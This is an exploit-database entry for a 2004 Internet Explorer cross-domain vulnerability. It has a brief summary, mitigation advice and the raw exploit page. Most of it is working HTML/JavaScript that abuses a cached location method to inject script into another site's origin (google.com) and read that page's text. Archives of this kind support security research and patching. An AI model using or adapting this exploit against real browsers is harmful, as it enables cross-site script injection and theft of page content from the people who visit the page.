header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
milw0rm.com
7.5
CVSS
HIGH
Overly Trusted Location Variant Method Cache
Not specified
CWE
Product Name: Internet Explorer
Affected Version From: Not specified
Affected Version To: Not specified
Patch Exists: NO
Related CWE: Not specified
CPE: Not specified
Metasploit:
Other Scripts:
Platforms Tested: Windows
2004

Overly Trusted Location Variant Method Cache Vulnerability

This vulnerability allows for arbitrary code execution and crashing of Internet Explorer. It can be triggered by visiting a malicious website. The exploit attempts to inject JavaScript code into the browser, causing it to crash. The vulnerability is unstable and may not always successfully execute the exploit.

Mitigation:

Apply security updates and patches for Internet Explorer. Avoid visiting untrusted or malicious websites.
Source

Exploit-DB raw data:

<html>
<body>
<b><font size="5">Overly Trusted Location Variant Method Cache Vulnerability</font></b>
<br><br>
<a href="#refresh" onclick="setTimeout('document.execCommand(\'Refresh\')',1000);"><font size=4 color=red>GO!</font></a><br><
+br>
This vulnerability seems to be unstable. For some reason, it crashes my internet explorer unless the exploit is executed onlo
+ad and even then it crashes sometimes.
<br><br>

<script>

var w=window.open("javascript:''","_blank","width=100,height=100,left=300,top=300");
var cpop=w.createPopup();
w.location.assign("http://google.com");
cpop.document.body.innerHTML='<button onactivate="document.parentWindow.location.cache=parent.open;var myint=setInterval(func
+tion(){try{var testvar=parent.document.write;}catch(e){clearInterval(myint);document.parentWindow.location.cache(\'javascrip
+t:alert(\\\'Javascript injected!\\\'+document.body.innerText)\',\'_self\')}},1000 /* theres some ratio of this number to the
+ chance of internet explorer crashing at offset 0019d19d :) */);"></button>';
cpop.show(1,1,1,1);

</script>
</body>
</html>


// milw0rm.com [2004-07-18]